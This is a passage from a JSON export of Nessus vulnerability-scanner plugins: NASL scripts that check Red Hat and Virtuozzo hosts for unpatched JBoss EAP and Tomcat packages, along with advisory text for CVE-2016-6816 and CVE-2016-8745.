(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0245\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-cxf-2.7.18-5.SP4_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hornetq-2.3.25-18.SP16_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"infinispan-5.2.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"infinispan-cachestore-jdbc-5.2.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"infinispan-cachestore-remote-5.2.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"infinispan-client-hotrod-5.2.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"infinispan-core-5.2.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-appclient-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cli-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-client-all-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-clustering-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-cmp-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-configadmin-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-connector-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-console-2.5.15-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-controller-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-controller-client-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-core-security-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-repository-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-deployment-scanner-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-http-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-domain-management-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ee-deployment-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-ejb3-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-embedded-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-host-controller-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jacorb-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxr-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jaxrs-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jdr-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jmx-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jpa-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jsf-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-jsr77-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-logging-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-mail-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-management-client-content-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-messaging-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-modcluster-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-naming-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-network-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-configadmin-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-osgi-service-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-picketlink-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-platform-mbean-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-pojo-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-process-controller-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-protocol-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-remoting-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-sar-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-security-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-server-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-system-jmx-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-threads-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-transactions-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-version-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-web-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-webservices-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-weld-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-as-xts-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-ejb-client-1.0.38-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jboss-hal-2.5.15-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-appclient-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-bundles-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-core-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-domain-7.5.13-5.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-javadocs-7.5.13-3.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-modules-eap-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-product-eap-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-standalone-7.5.13-5.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossas-welcome-content-eap-7.5.13-2.Final_redhat_2.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbossweb-7.5.20-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"resteasy-2.3.16-1.Final_redhat_1.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-cxf / hornetq / infinispan / infinispan-cachestore-jdbc / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:11:49", "bulletinFamily": "scanner", "description": "An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0935.NASL", "href": "https://www.tenable.com/plugins/nessus/101450", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc (VZLSA-2017-0935)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101450);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8745\"\n );\n\n script_name(english:\"Virtuozzo 7 : tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc (VZLSA-2017-0935)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for tomcat is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0935.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf47d5ba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0935\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.69-11.vl7\",\n \"tomcat-admin-webapps-7.0.69-11.vl7\",\n \"tomcat-docs-webapp-7.0.69-11.vl7\",\n \"tomcat-el-2.2-api-7.0.69-11.vl7\",\n \"tomcat-javadoc-7.0.69-11.vl7\",\n \"tomcat-jsp-2.2-api-7.0.69-11.vl7\",\n \"tomcat-jsvc-7.0.69-11.vl7\",\n \"tomcat-lib-7.0.69-11.vl7\",\n \"tomcat-servlet-3.0-api-7.0.69-11.vl7\",\n \"tomcat-webapps-7.0.69-11.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:11:47", "bulletinFamily": "scanner", "description": "An update for tomcat6 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0527.NASL", "href": "https://www.tenable.com/plugins/nessus/101438", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 6 : tomcat6 / tomcat6-admin-webapps / etc (VZLSA-2017-0527)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101438);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-6816\",\n \"CVE-2016-8745\"\n );\n\n script_name(english:\"Virtuozzo 6 : tomcat6 / tomcat6-admin-webapps / etc (VZLSA-2017-0527)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for tomcat6 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nApache Tomcat is a servlet container for the Java Servlet and\nJavaServer Pages (JSP) technologies.\n\nSecurity Fix(es) :\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request\nerror when request contains characters that are not permitted by the\nHTTP specification to appear not encoded, even though they were\npreviously accepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\n(|) in not encoded form, as these are often used in URLs without being\nproperly encoded.\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0527.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f9920be2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0527\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat6 / tomcat6-admin-webapps / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat6-6.0.24-105.vl6\",\n \"tomcat6-admin-webapps-6.0.24-105.vl6\",\n \"tomcat6-docs-webapp-6.0.24-105.vl6\",\n \"tomcat6-el-2.1-api-6.0.24-105.vl6\",\n \"tomcat6-javadoc-6.0.24-105.vl6\",\n \"tomcat6-jsp-2.1-api-6.0.24-105.vl6\",\n 